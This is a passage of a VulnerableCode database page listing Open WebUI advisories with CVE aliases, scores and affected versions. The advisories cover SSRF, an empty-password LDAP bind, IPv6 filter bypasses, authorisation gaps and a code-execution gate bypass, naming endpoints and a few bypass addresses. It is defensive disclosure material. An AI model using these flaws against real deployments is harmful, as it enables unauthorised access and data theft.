http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.6.19 |
|
|
| aliases |
CVE-2026-44569, GHSA-jxwr-g6r6-j3fx
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-mn21-kwuu-w7by |
|
| 34 |
| url |
VCID-n4ma-zcpv-5fbp |
| vulnerability_id |
VCID-n4ma-zcpv-5fbp |
| summary |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, the POST /api/v1/models/import endpoint allows users with the workspace.models_import permission to overwrite any existing model in the database, regardless of ownership. When an imported model's ID matches an existing model, the endpoint merges the attacker's payload over the existing model data and writes it to the database with no ownership or access grant validation. Additionally, filter_allowed_access_grants is never called, bypassing the access grant restrictions enforced on all other model mutation endpoints. This vulnerability is fixed in 0.9.0. |
| references |
|
| fixed_packages |
| 0 |
| url |
pkg:pypi/open-webui@0.9.0 |
| purl |
pkg:pypi/open-webui@0.9.0 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1g27-4vq6-7kdz |
|
| 1 |
| vulnerability |
VCID-1tu1-b9de-nfaa |
|
| 2 |
| vulnerability |
VCID-4v8w-kv6g-kkbc |
|
| 3 |
| vulnerability |
VCID-4x63-8x64-d3bq |
|
| 4 |
| vulnerability |
VCID-5jna-wvd7-j7cm |
|
| 5 |
| vulnerability |
VCID-5wfg-zqcy-c7ar |
|
| 6 |
| vulnerability |
VCID-8nzh-cpda-dkca |
|
| 7 |
| vulnerability |
VCID-8y4k-pj2n-8uhm |
|
| 8 |
| vulnerability |
VCID-cw4k-3s8z-uqh8 |
|
| 9 |
| vulnerability |
VCID-dz6g-jgmg-wqce |
|
| 10 |
| vulnerability |
VCID-dzh3-rqx4-fqhv |
|
| 11 |
| vulnerability |
VCID-ef1t-pxjm-j7cz |
|
| 12 |
| vulnerability |
VCID-hj5f-yk3y-ffdg |
|
| 13 |
| vulnerability |
VCID-wcz4-vwx4-tufb |
|
| 14 |
| vulnerability |
VCID-yug9-shts-kufb |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.0 |
|
|
| aliases |
CVE-2026-44562, GHSA-mqq6-cqcx-38vg
|
| risk_score |
3.1 |
| exploitability |
0.5 |
| weighted_severity |
6.2 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-n4ma-zcpv-5fbp |
|
| 35 |
| url |
VCID-nxvm-97r4-6ybz |
| vulnerability_id |
VCID-nxvm-97r4-6ybz |
| summary |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, the type: "file" (non-full-context), type: "text" with collection_name, and bare collection_name/collection_names paths in the get_sources_from_items function perform vector store queries without any authorization check, allowing users to extract content from files and knowledge bases they do not have access to. This vulnerability is fixed in 0.9.0. |
| references |
|
| fixed_packages |
| 0 |
| url |
pkg:pypi/open-webui@0.9.0 |
| purl |
pkg:pypi/open-webui@0.9.0 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1g27-4vq6-7kdz |
|
| 1 |
| vulnerability |
VCID-1tu1-b9de-nfaa |
|
| 2 |
| vulnerability |
VCID-4v8w-kv6g-kkbc |
|
| 3 |
| vulnerability |
VCID-4x63-8x64-d3bq |
|
| 4 |
| vulnerability |
VCID-5jna-wvd7-j7cm |
|
| 5 |
| vulnerability |
VCID-5wfg-zqcy-c7ar |
|
| 6 |
| vulnerability |
VCID-8nzh-cpda-dkca |
|
| 7 |
| vulnerability |
VCID-8y4k-pj2n-8uhm |
|
| 8 |
| vulnerability |
VCID-cw4k-3s8z-uqh8 |
|
| 9 |
| vulnerability |
VCID-dz6g-jgmg-wqce |
|
| 10 |
| vulnerability |
VCID-dzh3-rqx4-fqhv |
|
| 11 |
| vulnerability |
VCID-ef1t-pxjm-j7cz |
|
| 12 |
| vulnerability |
VCID-hj5f-yk3y-ffdg |
|
| 13 |
| vulnerability |
VCID-wcz4-vwx4-tufb |
|
| 14 |
| vulnerability |
VCID-yug9-shts-kufb |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.0 |
|
|
| aliases |
CVE-2026-44560, GHSA-h36f-rqpx-j5wx
|
| risk_score |
3.1 |
| exploitability |
0.5 |
| weighted_severity |
6.2 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-nxvm-97r4-6ybz |
|
| 36 |
| url |
VCID-pkds-1xgn-q3bv |
| vulnerability_id |
VCID-pkds-1xgn-q3bv |
| summary |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, the LDAP authentication endpoint does not validate that the submitted password is non-empty before performing a Simple Bind against the LDAP server. The LdapForm Pydantic model accepts password: str with no minimum length constraint, so an empty string passes validation. The subsequent Connection.bind() call succeeds on vulnerable LDAP servers, and the application issues a full session token for the target user. This vulnerability is fixed in 0.9.0. |
| references |
|
| fixed_packages |
| 0 |
| url |
pkg:pypi/open-webui@0.9.0 |
| purl |
pkg:pypi/open-webui@0.9.0 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1g27-4vq6-7kdz |
|
| 1 |
| vulnerability |
VCID-1tu1-b9de-nfaa |
|
| 2 |
| vulnerability |
VCID-4v8w-kv6g-kkbc |
|
| 3 |
| vulnerability |
VCID-4x63-8x64-d3bq |
|
| 4 |
| vulnerability |
VCID-5jna-wvd7-j7cm |
|
| 5 |
| vulnerability |
VCID-5wfg-zqcy-c7ar |
|
| 6 |
| vulnerability |
VCID-8nzh-cpda-dkca |
|
| 7 |
| vulnerability |
VCID-8y4k-pj2n-8uhm |
|
| 8 |
| vulnerability |
VCID-cw4k-3s8z-uqh8 |
|
| 9 |
| vulnerability |
VCID-dz6g-jgmg-wqce |
|
| 10 |
| vulnerability |
VCID-dzh3-rqx4-fqhv |
|
| 11 |
| vulnerability |
VCID-ef1t-pxjm-j7cz |
|
| 12 |
| vulnerability |
VCID-hj5f-yk3y-ffdg |
|
| 13 |
| vulnerability |
VCID-wcz4-vwx4-tufb |
|
| 14 |
| vulnerability |
VCID-yug9-shts-kufb |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.0 |
|
|
| aliases |
CVE-2026-44551, GHSA-2r4p-jpmg-48f4
|
| risk_score |
4.5 |
| exploitability |
0.5 |
| weighted_severity |
9.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-pkds-1xgn-q3bv |
|
| 37 |
| url |
VCID-pvep-chj7-ekeg |
| vulnerability_id |
VCID-pvep-chj7-ekeg |
| summary |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Versions 0.6.224 and prior contain a code injection vulnerability in the Direct Connections feature that allows malicious external model servers to execute arbitrary JavaScript in victim browsers via Server-Sent Event (SSE) execute events. This leads to authentication token theft, complete account takeover, and when chained with the Functions API, enables remote code execution on the backend server. The attack requires the victim to enable Direct Connections (disabled by default) and add the attacker's malicious model URL, achievable through social engineering of the admin and subsequent users. This issue is fixed in version 0.6.35. |
| references |
|
| fixed_packages |
| 0 |
| url |
pkg:pypi/open-webui@0.6.35 |
| purl |
pkg:pypi/open-webui@0.6.35 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-14xt-qwyg-w3cj |
|
| 1 |
| vulnerability |
VCID-1g27-4vq6-7kdz |
|
| 2 |
| vulnerability |
VCID-1tu1-b9de-nfaa |
|
| 3 |
| vulnerability |
VCID-2rs8-62x1-s7h7 |
|
| 4 |
| vulnerability |
VCID-2xdz-v8cw-fygv |
|
| 5 |
| vulnerability |
VCID-32yb-vsfs-43a8 |
|
| 6 |
| vulnerability |
VCID-3436-znsq-guds |
|
| 7 |
| vulnerability |
VCID-4rz6-hw32-jueb |
|
| 8 |
| vulnerability |
VCID-4v8w-kv6g-kkbc |
|
| 9 |
| vulnerability |
VCID-4x63-8x64-d3bq |
|
| 10 |
| vulnerability |
VCID-5319-t7jm-y3bx |
|
| 11 |
| vulnerability |
VCID-5jna-wvd7-j7cm |
|
| 12 |
| vulnerability |
VCID-5wfg-zqcy-c7ar |
|
| 13 |
| vulnerability |
VCID-5wzn-mfwg-ybc3 |
|
| 14 |
| vulnerability |
VCID-66zh-9jk7-9bfx |
|
| 15 |
| vulnerability |
VCID-6rbm-rm25-hqgy |
|
| 16 |
| vulnerability |
VCID-7nbc-ng1s-suck |
|
| 17 |
| vulnerability |
VCID-8n6u-wgz9-1bgj |
|
| 18 |
| vulnerability |
VCID-8nzh-cpda-dkca |
|
| 19 |
| vulnerability |
VCID-8y4k-pj2n-8uhm |
|
| 20 |
| vulnerability |
VCID-94nj-qkdf-xfhn |
|
| 21 |
| vulnerability |
VCID-9jud-sr2a-8yc3 |
|
| 22 |
| vulnerability |
VCID-chug-ma8r-cucc |
|
| 23 |
| vulnerability |
VCID-cw4k-3s8z-uqh8 |
|
| 24 |
| vulnerability |
VCID-dz6g-jgmg-wqce |
|
| 25 |
| vulnerability |
VCID-dzh3-rqx4-fqhv |
|
| 26 |
| vulnerability |
VCID-ef1t-pxjm-j7cz |
|
| 27 |
| vulnerability |
VCID-hj5f-yk3y-ffdg |
|
| 28 |
| vulnerability |
VCID-jfs9-dps1-27a2 |
|
| 29 |
| vulnerability |
VCID-k9jf-5jzd-pkge |
|
| 30 |
| vulnerability |
VCID-n4ma-zcpv-5fbp |
|
| 31 |
| vulnerability |
VCID-nxvm-97r4-6ybz |
|
| 32 |
| vulnerability |
VCID-pkds-1xgn-q3bv |
|
| 33 |
| vulnerability |
VCID-pwsg-72yy-quhk |
|
| 34 |
| vulnerability |
VCID-q682-k826-efhv |
|
| 35 |
| vulnerability |
VCID-qgfh-7u8n-y7c7 |
|
| 36 |
| vulnerability |
VCID-qjt1-zxx8-r7ht |
|
| 37 |
| vulnerability |
VCID-r7vt-4bqm-f7hb |
|
| 38 |
| vulnerability |
VCID-reqw-pfm8-c7g5 |
|
| 39 |
| vulnerability |
VCID-rhhj-rccv-87hw |
|
| 40 |
| vulnerability |
VCID-s625-eg1w-gfd1 |
|
| 41 |
| vulnerability |
VCID-t571-d65a-cyb2 |
|
| 42 |
| vulnerability |
VCID-u25g-p4nx-gqd1 |
|
| 43 |
| vulnerability |
VCID-ujye-g4rj-8be5 |
|
| 44 |
| vulnerability |
VCID-um53-kf7u-kkg6 |
|
| 45 |
| vulnerability |
VCID-vghe-uuzj-m7cu |
|
| 46 |
| vulnerability |
VCID-vkx3-71kv-sugt |
|
| 47 |
| vulnerability |
VCID-w2vd-r3hr-w3bt |
|
| 48 |
| vulnerability |
VCID-wb88-83cj-ffhy |
|
| 49 |
| vulnerability |
VCID-wcz4-vwx4-tufb |
|
| 50 |
| vulnerability |
VCID-yug9-shts-kufb |
|
| 51 |
| vulnerability |
VCID-yysb-dk2k-f7g4 |
|
| 52 |
| vulnerability |
VCID-ze3m-g96u-27fc |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.6.35 |
|
|
| aliases |
CVE-2025-64496, GHSA-cm35-v4vp-5xvx
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-pvep-chj7-ekeg |
|
| 38 |
| url |
VCID-pwsg-72yy-quhk |
| vulnerability_id |
VCID-pwsg-72yy-quhk |
| summary |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.8.6, there is a vulnerability in chat completion API, which allows attackers to bypass tool restrictions, potentially enabling unauthorized actions or access. In the chat_completion API, the parameters tool_ids and tool_servers are supplied by the user. These parameters are used to create a tools_dict by the middleware. This is then used by get_tool_by_id to retrieve the appropriate tool. However, there is no checks in that ensures the user that uses the API has permission to use the tool, meaning that a user can invoke any server tool by supplying the correct tool_id or tool_servers parameters via the chat completion API. Moreover, the authentication token stored in the server would be used when invoking the tool, so the tool will be invoked with the server privilege. This vulnerability is fixed in 0.8.6. |
| references |
|
| fixed_packages |
| 0 |
| url |
pkg:pypi/open-webui@0.8.6 |
| purl |
pkg:pypi/open-webui@0.8.6 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-14xt-qwyg-w3cj |
|
| 1 |
| vulnerability |
VCID-1g27-4vq6-7kdz |
|
| 2 |
| vulnerability |
VCID-1tu1-b9de-nfaa |
|
| 3 |
| vulnerability |
VCID-2xdz-v8cw-fygv |
|
| 4 |
| vulnerability |
VCID-32yb-vsfs-43a8 |
|
| 5 |
| vulnerability |
VCID-3436-znsq-guds |
|
| 6 |
| vulnerability |
VCID-4v8w-kv6g-kkbc |
|
| 7 |
| vulnerability |
VCID-4x63-8x64-d3bq |
|
| 8 |
| vulnerability |
VCID-5319-t7jm-y3bx |
|
| 9 |
| vulnerability |
VCID-5jna-wvd7-j7cm |
|
| 10 |
| vulnerability |
VCID-5wfg-zqcy-c7ar |
|
| 11 |
| vulnerability |
VCID-5wzn-mfwg-ybc3 |
|
| 12 |
| vulnerability |
VCID-6rbm-rm25-hqgy |
|
| 13 |
| vulnerability |
VCID-8nzh-cpda-dkca |
|
| 14 |
| vulnerability |
VCID-8y4k-pj2n-8uhm |
|
| 15 |
| vulnerability |
VCID-chug-ma8r-cucc |
|
| 16 |
| vulnerability |
VCID-cw4k-3s8z-uqh8 |
|
| 17 |
| vulnerability |
VCID-dz6g-jgmg-wqce |
|
| 18 |
| vulnerability |
VCID-dzh3-rqx4-fqhv |
|
| 19 |
| vulnerability |
VCID-ef1t-pxjm-j7cz |
|
| 20 |
| vulnerability |
VCID-hj5f-yk3y-ffdg |
|
| 21 |
| vulnerability |
VCID-jfs9-dps1-27a2 |
|
| 22 |
| vulnerability |
VCID-k9jf-5jzd-pkge |
|
| 23 |
| vulnerability |
VCID-n4ma-zcpv-5fbp |
|
| 24 |
| vulnerability |
VCID-nxvm-97r4-6ybz |
|
| 25 |
| vulnerability |
VCID-pkds-1xgn-q3bv |
|
| 26 |
| vulnerability |
VCID-q682-k826-efhv |
|
| 27 |
| vulnerability |
VCID-qgfh-7u8n-y7c7 |
|
| 28 |
| vulnerability |
VCID-qjt1-zxx8-r7ht |
|
| 29 |
| vulnerability |
VCID-r7vt-4bqm-f7hb |
|
| 30 |
| vulnerability |
VCID-reqw-pfm8-c7g5 |
|
| 31 |
| vulnerability |
VCID-rhhj-rccv-87hw |
|
| 32 |
| vulnerability |
VCID-s625-eg1w-gfd1 |
|
| 33 |
| vulnerability |
VCID-t571-d65a-cyb2 |
|
| 34 |
| vulnerability |
VCID-um53-kf7u-kkg6 |
|
| 35 |
| vulnerability |
VCID-vghe-uuzj-m7cu |
|
| 36 |
| vulnerability |
VCID-vkx3-71kv-sugt |
|
| 37 |
| vulnerability |
VCID-w2vd-r3hr-w3bt |
|
| 38 |
| vulnerability |
VCID-wb88-83cj-ffhy |
|
| 39 |
| vulnerability |
VCID-wcz4-vwx4-tufb |
|
| 40 |
| vulnerability |
VCID-yug9-shts-kufb |
|
| 41 |
| vulnerability |
VCID-yysb-dk2k-f7g4 |
|
| 42 |
| vulnerability |
VCID-ze3m-g96u-27fc |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.8.6 |
|
|
| aliases |
CVE-2026-45350, GHSA-4pcg-253r-rf9w
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-pwsg-72yy-quhk |
|
| 39 |
| url |
VCID-q682-k826-efhv |
| vulnerability_id |
VCID-q682-k826-efhv |
| summary |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, a Server-Side Request Forgery (SSRF) vulnerability exists in _process_picture_url() in backend/open_webui/utils/oauth.py (line ~1338). The function fetches arbitrary URLs from OAuth picture claims without applying validate_url(), allowing an attacker to force the server to make HTTP requests to internal resources and exfiltrate the full response. This vulnerability is fixed in 0.9.0. |
| references |
|
| fixed_packages |
| 0 |
| url |
pkg:pypi/open-webui@0.9.0 |
| purl |
pkg:pypi/open-webui@0.9.0 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1g27-4vq6-7kdz |
|
| 1 |
| vulnerability |
VCID-1tu1-b9de-nfaa |
|
| 2 |
| vulnerability |
VCID-4v8w-kv6g-kkbc |
|
| 3 |
| vulnerability |
VCID-4x63-8x64-d3bq |
|
| 4 |
| vulnerability |
VCID-5jna-wvd7-j7cm |
|
| 5 |
| vulnerability |
VCID-5wfg-zqcy-c7ar |
|
| 6 |
| vulnerability |
VCID-8nzh-cpda-dkca |
|
| 7 |
| vulnerability |
VCID-8y4k-pj2n-8uhm |
|
| 8 |
| vulnerability |
VCID-cw4k-3s8z-uqh8 |
|
| 9 |
| vulnerability |
VCID-dz6g-jgmg-wqce |
|
| 10 |
| vulnerability |
VCID-dzh3-rqx4-fqhv |
|
| 11 |
| vulnerability |
VCID-ef1t-pxjm-j7cz |
|
| 12 |
| vulnerability |
VCID-hj5f-yk3y-ffdg |
|
| 13 |
| vulnerability |
VCID-wcz4-vwx4-tufb |
|
| 14 |
| vulnerability |
VCID-yug9-shts-kufb |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.0 |
|
|
| aliases |
CVE-2026-45338, GHSA-24c9-2m8q-qhmh
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-q682-k826-efhv |
|
| 40 |
| url |
VCID-qgfh-7u8n-y7c7 |
| vulnerability_id |
VCID-qgfh-7u8n-y7c7 |
| summary |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, any authenticated user can permanently delete files owned by other users via DELETE /api/v1/files/{id} when the target file is referenced in any shared chat. The has_access_to_file() authorization gate unconditionally grants access through its shared-chat branch. It checks neither the requesting user's identity nor the type of operation being performed. File UUIDs (which would otherwise be impractical to guess) are disclosed to any user with read access to a knowledge base via GET /api/v1/knowledge/{id}/files. This vulnerability is fixed in 0.9.0. |
| references |
|
| fixed_packages |
| 0 |
| url |
pkg:pypi/open-webui@0.9.0 |
| purl |
pkg:pypi/open-webui@0.9.0 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1g27-4vq6-7kdz |
|
| 1 |
| vulnerability |
VCID-1tu1-b9de-nfaa |
|
| 2 |
| vulnerability |
VCID-4v8w-kv6g-kkbc |
|
| 3 |
| vulnerability |
VCID-4x63-8x64-d3bq |
|
| 4 |
| vulnerability |
VCID-5jna-wvd7-j7cm |
|
| 5 |
| vulnerability |
VCID-5wfg-zqcy-c7ar |
|
| 6 |
| vulnerability |
VCID-8nzh-cpda-dkca |
|
| 7 |
| vulnerability |
VCID-8y4k-pj2n-8uhm |
|
| 8 |
| vulnerability |
VCID-cw4k-3s8z-uqh8 |
|
| 9 |
| vulnerability |
VCID-dz6g-jgmg-wqce |
|
| 10 |
| vulnerability |
VCID-dzh3-rqx4-fqhv |
|
| 11 |
| vulnerability |
VCID-ef1t-pxjm-j7cz |
|
| 12 |
| vulnerability |
VCID-hj5f-yk3y-ffdg |
|
| 13 |
| vulnerability |
VCID-wcz4-vwx4-tufb |
|
| 14 |
| vulnerability |
VCID-yug9-shts-kufb |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.0 |
|
|
| aliases |
CVE-2026-45671, GHSA-26g9-27vm-x3q8
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-qgfh-7u8n-y7c7 |
|
| 41 |
| url |
VCID-qjt1-zxx8-r7ht |
| vulnerability_id |
VCID-qjt1-zxx8-r7ht |
| summary |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, the POST /api/v1/retrieval/process/web endpoint accepts a user-supplied collection_name and an overwrite query parameter (default: True). It performs no authorization check on whether the calling user owns or has write access to the target collection. When overwrite=True, save_docs_to_vector_db calls VECTOR_DB_CLIENT.delete_collection() on the target collection before writing new content. This vulnerability is fixed in 0.9.0. |
| references |
|
| fixed_packages |
| 0 |
| url |
pkg:pypi/open-webui@0.9.0 |
| purl |
pkg:pypi/open-webui@0.9.0 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1g27-4vq6-7kdz |
|
| 1 |
| vulnerability |
VCID-1tu1-b9de-nfaa |
|
| 2 |
| vulnerability |
VCID-4v8w-kv6g-kkbc |
|
| 3 |
| vulnerability |
VCID-4x63-8x64-d3bq |
|
| 4 |
| vulnerability |
VCID-5jna-wvd7-j7cm |
|
| 5 |
| vulnerability |
VCID-5wfg-zqcy-c7ar |
|
| 6 |
| vulnerability |
VCID-8nzh-cpda-dkca |
|
| 7 |
| vulnerability |
VCID-8y4k-pj2n-8uhm |
|
| 8 |
| vulnerability |
VCID-cw4k-3s8z-uqh8 |
|
| 9 |
| vulnerability |
VCID-dz6g-jgmg-wqce |
|
| 10 |
| vulnerability |
VCID-dzh3-rqx4-fqhv |
|
| 11 |
| vulnerability |
VCID-ef1t-pxjm-j7cz |
|
| 12 |
| vulnerability |
VCID-hj5f-yk3y-ffdg |
|
| 13 |
| vulnerability |
VCID-wcz4-vwx4-tufb |
|
| 14 |
| vulnerability |
VCID-yug9-shts-kufb |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.0 |
|
|
| aliases |
CVE-2026-44554, GHSA-7r82-qhg4-6wvj
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-qjt1-zxx8-r7ht |
|
| 42 |
| url |
VCID-r7vt-4bqm-f7hb |
| vulnerability_id |
VCID-r7vt-4bqm-f7hb |
| summary |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, the GET /api/v1/channels/{id}/members endpoint only checks membership for group and dm channel types (lines 467-469). For standard channels — including private ones — there is no channel_has_access check before returning the member list. Any authenticated user who knows a private channel's UUID can enumerate all users with access to that channel. This vulnerability is fixed in 0.9.0. |
| references |
|
| fixed_packages |
| 0 |
| url |
pkg:pypi/open-webui@0.9.0 |
| purl |
pkg:pypi/open-webui@0.9.0 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1g27-4vq6-7kdz |
|
| 1 |
| vulnerability |
VCID-1tu1-b9de-nfaa |
|
| 2 |
| vulnerability |
VCID-4v8w-kv6g-kkbc |
|
| 3 |
| vulnerability |
VCID-4x63-8x64-d3bq |
|
| 4 |
| vulnerability |
VCID-5jna-wvd7-j7cm |
|
| 5 |
| vulnerability |
VCID-5wfg-zqcy-c7ar |
|
| 6 |
| vulnerability |
VCID-8nzh-cpda-dkca |
|
| 7 |
| vulnerability |
VCID-8y4k-pj2n-8uhm |
|
| 8 |
| vulnerability |
VCID-cw4k-3s8z-uqh8 |
|
| 9 |
| vulnerability |
VCID-dz6g-jgmg-wqce |
|
| 10 |
| vulnerability |
VCID-dzh3-rqx4-fqhv |
|
| 11 |
| vulnerability |
VCID-ef1t-pxjm-j7cz |
|
| 12 |
| vulnerability |
VCID-hj5f-yk3y-ffdg |
|
| 13 |
| vulnerability |
VCID-wcz4-vwx4-tufb |
|
| 14 |
| vulnerability |
VCID-yug9-shts-kufb |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.0 |
|
|
| aliases |
CVE-2026-44559, GHSA-c7wp-3qh5-55pv
|
| risk_score |
3.1 |
| exploitability |
0.5 |
| weighted_severity |
6.2 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-r7vt-4bqm-f7hb |
|
| 43 |
| url |
VCID-reqw-pfm8-c7g5 |
| vulnerability_id |
VCID-reqw-pfm8-c7g5 |
| summary |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.8.12, the /api/v1/utils/code/execute endpoint executes arbitrary Python code via Jupyter for any verified user, even when the admin has set ENABLE_CODE_EXECUTION=false. The feature gate is not enforced on the API endpoint — the configuration says "disabled" but code still executes. This vulnerability is fixed in 0.8.12. |
| references |
|
| fixed_packages |
| 0 |
| url |
pkg:pypi/open-webui@0.8.12 |
| purl |
pkg:pypi/open-webui@0.8.12 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-14xt-qwyg-w3cj |
|
| 1 |
| vulnerability |
VCID-1g27-4vq6-7kdz |
|
| 2 |
| vulnerability |
VCID-1tu1-b9de-nfaa |
|
| 3 |
| vulnerability |
VCID-2xdz-v8cw-fygv |
|
| 4 |
| vulnerability |
VCID-32yb-vsfs-43a8 |
|
| 5 |
| vulnerability |
VCID-3436-znsq-guds |
|
| 6 |
| vulnerability |
VCID-4v8w-kv6g-kkbc |
|
| 7 |
| vulnerability |
VCID-4x63-8x64-d3bq |
|
| 8 |
| vulnerability |
VCID-5319-t7jm-y3bx |
|
| 9 |
| vulnerability |
VCID-5jna-wvd7-j7cm |
|
| 10 |
| vulnerability |
VCID-5wfg-zqcy-c7ar |
|
| 11 |
| vulnerability |
VCID-5wzn-mfwg-ybc3 |
|
| 12 |
| vulnerability |
VCID-8nzh-cpda-dkca |
|
| 13 |
| vulnerability |
VCID-8y4k-pj2n-8uhm |
|
| 14 |
| vulnerability |
VCID-chug-ma8r-cucc |
|
| 15 |
| vulnerability |
VCID-cw4k-3s8z-uqh8 |
|
| 16 |
| vulnerability |
VCID-dz6g-jgmg-wqce |
|
| 17 |
| vulnerability |
VCID-dzh3-rqx4-fqhv |
|
| 18 |
| vulnerability |
VCID-ef1t-pxjm-j7cz |
|
| 19 |
| vulnerability |
VCID-hj5f-yk3y-ffdg |
|
| 20 |
| vulnerability |
VCID-jfs9-dps1-27a2 |
|
| 21 |
| vulnerability |
VCID-n4ma-zcpv-5fbp |
|
| 22 |
| vulnerability |
VCID-nxvm-97r4-6ybz |
|
| 23 |
| vulnerability |
VCID-pkds-1xgn-q3bv |
|
| 24 |
| vulnerability |
VCID-q682-k826-efhv |
|
| 25 |
| vulnerability |
VCID-qgfh-7u8n-y7c7 |
|
| 26 |
| vulnerability |
VCID-qjt1-zxx8-r7ht |
|
| 27 |
| vulnerability |
VCID-r7vt-4bqm-f7hb |
|
| 28 |
| vulnerability |
VCID-rhhj-rccv-87hw |
|
| 29 |
| vulnerability |
VCID-s625-eg1w-gfd1 |
|
| 30 |
| vulnerability |
VCID-t571-d65a-cyb2 |
|
| 31 |
| vulnerability |
VCID-vghe-uuzj-m7cu |
|
| 32 |
| vulnerability |
VCID-vkx3-71kv-sugt |
|
| 33 |
| vulnerability |
VCID-w2vd-r3hr-w3bt |
|
| 34 |
| vulnerability |
VCID-wcz4-vwx4-tufb |
|
| 35 |
| vulnerability |
VCID-yug9-shts-kufb |
|
| 36 |
| vulnerability |
VCID-yysb-dk2k-f7g4 |
|
| 37 |
| vulnerability |
VCID-ze3m-g96u-27fc |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.8.12 |
|
|
| aliases |
CVE-2026-45672, GHSA-482j-2pq6-q5w4
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-reqw-pfm8-c7g5 |
|
| 44 |
| url |
VCID-rhhj-rccv-87hw |
| vulnerability_id |
VCID-rhhj-rccv-87hw |
| summary |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, validate_url() in backend/open_webui/retrieval/web/utils.py calls validators.ipv6(ip, private=True), but the validators library does NOT implement the private keyword for IPv6 — the call raises a ValidationError (which is falsy in a boolean context), so every IPv6 address passes the filter. In addition, IPv4-mapped IPv6 (::ffff:10.0.0.1) bypasses the IPv4 check entirely, and several reserved IPv4 ranges (0.0.0.0/8, 100.64.0.0/10, 192.0.0.0/24, etc.) are not blocked. This vulnerability is fixed in 0.9.0. |
| references |
|
| fixed_packages |
| 0 |
| url |
pkg:pypi/open-webui@0.9.0 |
| purl |
pkg:pypi/open-webui@0.9.0 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1g27-4vq6-7kdz |
|
| 1 |
| vulnerability |
VCID-1tu1-b9de-nfaa |
|
| 2 |
| vulnerability |
VCID-4v8w-kv6g-kkbc |
|
| 3 |
| vulnerability |
VCID-4x63-8x64-d3bq |
|
| 4 |
| vulnerability |
VCID-5jna-wvd7-j7cm |
|
| 5 |
| vulnerability |
VCID-5wfg-zqcy-c7ar |
|
| 6 |
| vulnerability |
VCID-8nzh-cpda-dkca |
|
| 7 |
| vulnerability |
VCID-8y4k-pj2n-8uhm |
|
| 8 |
| vulnerability |
VCID-cw4k-3s8z-uqh8 |
|
| 9 |
| vulnerability |
VCID-dz6g-jgmg-wqce |
|
| 10 |
| vulnerability |
VCID-dzh3-rqx4-fqhv |
|
| 11 |
| vulnerability |
VCID-ef1t-pxjm-j7cz |
|
| 12 |
| vulnerability |
VCID-hj5f-yk3y-ffdg |
|
| 13 |
| vulnerability |
VCID-wcz4-vwx4-tufb |
|
| 14 |
| vulnerability |
VCID-yug9-shts-kufb |
|
|
| resource_url |
